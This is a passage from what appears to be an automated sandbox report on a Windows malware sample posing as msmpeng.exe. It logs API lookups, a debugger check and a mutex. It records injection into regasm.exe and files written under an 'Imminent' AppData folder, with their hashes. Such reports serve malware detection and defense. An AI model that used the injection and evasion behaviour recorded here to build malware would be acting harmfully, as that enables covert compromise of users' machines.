| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77908bfb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x778fb567 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77925998 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x778f2251 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x778f28f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x777e2004 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x77839aa9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7783f3cf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7780ebc6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7784f29f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x777e53a5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7784f21a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7783f70b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7783f71b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7783f72b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x777eeb4e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x777ebc0a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Wow64RevertWow64FsRedirection, address_out = 0x7783f5f9 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Wow64DisableWow64FsRedirection, address_out = 0x777ebc0a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateMutexW, address_out = 0x777f2aee |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x777fbf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindResourceW, address_out = 0x777f3e61 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SizeofResource, address_out = 0x777f3e7f |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadResource, address_out = 0x777f984d |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LockResource, address_out = 0x777efd29 |
|
3 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContext, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContextA, address_out = 0x76f791dd |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptCreateHash, address_out = 0x76f7df4e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptHashData, address_out = 0x76f7df36 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDeriveKey, address_out = 0x76fb3188 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDestroyHash, address_out = 0x76f7df66 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDecrypt, address_out = 0x76fb3178 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDestroyKey, address_out = 0x76f7c51a |
|
2 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptReleaseContext, address_out = 0x76f7e124 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x77802fb6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OpenProcess, address_out = 0x777f59d7 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualFree, address_out = 0x77801da4 |
|
2 |
Window (2)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | AutoIt v3 | class_name = AutoIt v3, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = edit, wndproc_parameter = 0 |
|
1 |
System (272)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 750 milliseconds (0.750 seconds) |
|
14 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
240 | |
| Get Time | type = System Time, time = 2019-01-21 16:19:46 (UTC) |
|
15 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = AuditNativeSnapIn |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe | - |
|
1 |
Process #11: regasm.exe
332
74
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe |
| Command Line | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:26, Reason: Child Process |
| Unmonitor | End Time: 00:02:30, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x24c |
| Parent PID | 0x30c (c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
2C8
0x
7F8
0x
78C
0x
7CC
0x
958
0x
95C
0x
978
0x
980
0x
984
0x
990
0x
5E4
0x
900
0x
9A0
0x
A48
0x
14C
0x
944
0x
948
0x
950
0x
960
0x
954
0x
938
0x
8B8
0x
21C
0x
998
0x
99C
0x
A84
0x
A8C
0x
A7C
0x
A88
0x
A9C
0x
A90
0x
A98
0x
6C0
0x
BD8
0x
C5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x001f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x00300fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00310fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0032ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0033ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0035ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00380fff | Pagefile Backed Memory | rw |
|
|
|
- |
| l_intl.nls | 0x00390000 | 0x00392fff | Memory Mapped File | r |
|
|
|
- |
| regasm.exe | 0x003a0000 | 0x003acfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x003c0000 | 0x003c4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003effff | Private Memory | - |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x00455fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00560fff | Pagefile Backed Memory | r |
|
|
|
- |
| rpcss.dll | 0x00570000 | 0x005cbfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x00570fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x0057afff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0058ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x005b3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Private Memory | - |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x0060ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0071ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0072ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x00736fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x00741fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x007affff | Pagefile Backed Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x007b0000 | 0x007f0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0080ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x00820000 | 0x00873fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00880fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x0098ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00990000 | 0x00c5efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c60000 | 0x00c60000 | 0x00cbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c60000 | 0x00c60000 | 0x00c60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c80000 | 0x00c80000 | 0x00cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00efffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x00ebefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ec0000 | 0x00ec0000 | 0x00efffff | Private Memory | rw |
|
|
|
- |
| regasm.exe | 0x00f70000 | 0x00f7ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000f80000 | 0x00f80000 | 0x01b7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001b80000 | 0x01b80000 | 0x03b7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003b80000 | 0x03b80000 | 0x03c28fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000003c30000 | 0x03c30000 | 0x04c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x05d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005d60000 | 0x05d60000 | 0x05faffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x05fb0000 | 0x0606ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000006070000 | 0x06070000 | 0x0616ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006170000 | 0x06170000 | 0x0626ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006340000 | 0x06340000 | 0x0643ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000064b0000 | 0x064b0000 | 0x065affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006640000 | 0x06640000 | 0x0673ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006820000 | 0x06820000 | 0x0691ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006920000 | 0x06920000 | 0x06a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006ac0000 | 0x06ac0000 | 0x06bbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006bc0000 | 0x06bc0000 | 0x06fb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000006fc0000 | 0x06fc0000 | 0x0714ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000071a0000 | 0x071a0000 | 0x0729ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007320000 | 0x07320000 | 0x0741ffff | Private Memory | rw |
|
|
|
- |
| system.management.ni.dll | 0x5fb80000 | 0x5fc83fff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x5fc90000 | 0x601c5fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.ni.dll | 0x601d0000 | 0x602c0fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.visualbasic.ni.dll | 0x602d0000 | 0x6046afff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x60340000 | 0x60347fff | Memory Mapped File | rwx |
|
|
|
- |
| system.windows.forms.ni.dll | 0x60470000 | 0x6104dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.drawing.ni.dll | 0x61050000 | 0x611d7fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x611e0000 | 0x6197bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x61980000 | 0x62477fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x62480000 | 0x62a2afff | Memory Mapped File | rwx |
|
|
|
- |
| mscorjit.dll | 0x62f50000 | 0x62faafff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x62fb0000 | 0x6304afff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x698d0000 | 0x69947fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x6fce0000 | 0x6fd29fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiutils.dll | 0x71490000 | 0x714a6fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x719c0000 | 0x719c9fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x71f00000 | 0x71f5bfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74060000 | 0x7409ffff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x742c0000 | 0x742d1fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x74330000 | 0x7433cfff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74420000 | 0x74426fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74430000 | 0x7444bfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74f80000 | 0x74f88fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x75010000 | 0x75014fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x752a0000 | 0x752dafff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x75380000 | 0x753c3fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x754b0000 | 0x754b5fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x754c0000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75500000 | 0x75515fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75980000 | 0x7598bfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75a20000 | 0x75a2dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75a30000 | 0x75a3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75e00000 | 0x75e8efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75f10000 | 0x76b59fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76b60000 | 0x76b94fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x771d0000 | 0x77226fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x772b0000 | 0x7740bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77a70000 | 0x77af2fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77b00000 | 0x77b05fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ff50000 | 0x7ff50000 | 0x7ff5ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000000007ff60000 | 0x7ff60000 | 0x7ffaffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 118 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #9: c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe | 0x2b4 | address = 0x400000, size = 352256 |
|
1 | |
| Modify Memory | #9: c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe | 0x2b4 | address = 0x7ffdb008, size = 4 |
|
1 | |
| Modify Control Flow | #9: c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe | 0x2b4 | os_tid = 0x2c8, address = 0x77927098 |
|
1 |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\network.dat | 0.03 KB |
MD5:
74b7dba5f2d2c6ee0b33d3392da83d16
SHA1: 71f88ba6cddc9fc7981593e9a1626fb38b31ebdd SHA256: a772d643043e9e4d10ce3cbefad39cd312cac38fd30f4f36edcead88df5fc6b5 SSDeep: 3:cE62oAttn:c0rttn |
|
|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Geo.dat | 0.03 KB |
MD5:
5c968bf21646d66492c1dd12d0d1c641
SHA1: db5de9eb47ba27964019961597062ee0f77e3797 SHA256: be0cf0ee8c14bb4c83ba264c5249b5e4fa526eba52e2fddeb60fb86bceb8018f SSDeep: 3:RMQGgr4/d+C:rGD/ |
|
|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Monitoring\system.dat | 0.02 KB |
MD5:
2cb9315e533e3700bedf1a77bba374bc
SHA1: c40c5eaf4227171ab007742d0af29bec01ee130c SHA256: a262de468045d279966577b6bae961c2f90650acbb91c7a4c88b380671d12281 SSDeep: 3:cE627w:c0k |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | 1.96 KB |
MD5:
1f6b6f8487eab69adaeb377edfcafc9d
SHA1: 2fad5a024e56ccbf56d97670902b8397a1919175 SHA256: ea075736526c71d4466d7e13f9513b40f375586ce59a3fe2eca6bb4d901ee5a7 SSDeep: 48:P2yTxnvIL7IswvgvaqahU53h7xjXR7L1s0ou1n:P2avyIrgv9gEVx1psvut |
|
|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | 2.64 KB |
MD5:
ccd7758db87057f11cd3d87af2177cdf
SHA1: 8679fb8624dbb7bbd7b4650247bb443abe653421 SHA256: b51fee6d6da9d792e4e0371213c3be39e7095060710d87fc9e5a70014c7d4569 SSDeep: 48:P2yTxnvIL7IswvgvaqahU53h7xjXR7L1s0ou1XR7L1s0ou1XR70:P2avyIrgv9gEVx1psvut1psvut10 |
|
|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | 1.28 KB |
MD5:
fee0e69c9a0a3fc5087dfc959acf112b
SHA1: a66e1c5764b408d04e87cd1325ca7b32479b2ea0 SHA256: ad4ed7f36308b740c267ece08a79d89996614e092bc5a8525356077934987cb8 SSDeep: 24:Pl4Gj9/8ExhNvILGfqIttGNavgDvrOrR/U6d1yUYL1lIYvWgh7UaIzm:P2yTxnvIL7IswvgvaqahU53h7p |
|
|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | 2.98 KB |
MD5:
f06c426e60a245af24494f9752f83f88
SHA1: 19e0ba2bb1fbfae9c9e19afc9c11e5910f11ca96 SHA256: 98f0b910c36ef2ed53b65e8b70e8733464e28f875df5d47ef701dc7f99754578 SSDeep: 48:P2yTxnvIL7IswvgvaqahU53h7xjXR7L1s0ou1XR7L1s0ou1XR7L1s0ou1n:P2avyIrgv9gEVx1psvut1psvut1psvut |
|
|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | 0.60 KB |
MD5:
994741989ba591b1c5e097d91b60dfc5
SHA1: 044b366541ab4e12456059c37ba4c37af3dfca5f SHA256: 513d4dfcfe24cfedd666d0c551ed11388cc98e5898275bbad784145266d9eef0 SSDeep: 12:KXVegxxM1oyMzy7KW9EQ863Aw5hRTvhtEFLGgp1kR71sKVH:Pl4Gj9/8ExhNvILGfqIH |
|
|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | 1.62 KB |
MD5:
b9f0f1bc1b32a411839c3290785cb2ac
SHA1: 29650a5a670c5adfaea6a3ab409bce1a19af8b99 SHA256: 0e0a4a6f87edf9189ac73974f61d38d854a8a7d86cc429ab4dc5b515a741f7fd SSDeep: 24:Pl4Gj9/8ExhNvILGfqIttGNavgDvrOrR/U6d1yUYL1lIYvWgh7UaIzeaaCQ8OZVa:P2yTxnvIL7IswvgvaqahU53h7xjXR70 |
|
|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | 0.26 KB |
MD5:
fc67b6992fee084a0ca0635b98b9f6d9
SHA1: 395b35ad7b955d380f76b15654219c8f0df4c151 SHA256: f7c03f2f3d92c01ed269b2f5fc3ccaa02e1559e20e164775fe135e0a3a5a6f36 SSDeep: 6:t9OXVegxGqWZCrMFb0V4CyM2uC77KW9SRfbk9s:KXVegxxM1oyMzy7KW9EQi |
|
|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | 0.94 KB |
MD5:
7cf1e7b6af8bf858baf4c6e2c6895870
SHA1: 58f02df49cf9877b1a246cc0c9d47b2b4c8edcfa SHA256: 5b91a94add2dd8e98d5de0fc3bbecea0497205139653dbb60284e4ff2544f554 SSDeep: 24:Pl4Gj9/8ExhNvILGfqIttGNavgDvrOrR/U6d1+:P2yTxnvIL7Iswvgvaqa+ |
|
|
| C:\Users\JPenUM\AppData\Roaming\Imminent\Logs\21-01-2019 | 2.30 KB |
MD5:
9ed4d3bc8a00a12c80f9e8d80423542a
SHA1: b52ffc461844c1b5227caf30fbb39b3a270c71f1 SHA256: ece76c8cfeec585ee9b2a1e4b183895d45be71cd5c3032bbd8a036607f300b99 SSDeep: 48:P2yTxnvIL7IswvgvaqahU53h7xjXR7L1s0ou1XR7L1s0ouq:P2avyIrgv9gEVx1psvut1psvuq |
|
|
Host Behavior
COM (23)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WbemDefaultPathParser | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
6 | |
| Create | WBEMLocator | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
3 | |
| Create | WBEMLocator | IWbemLocator | cls_context = CLSCTX_INPROC_SERVER |
|
5 | |
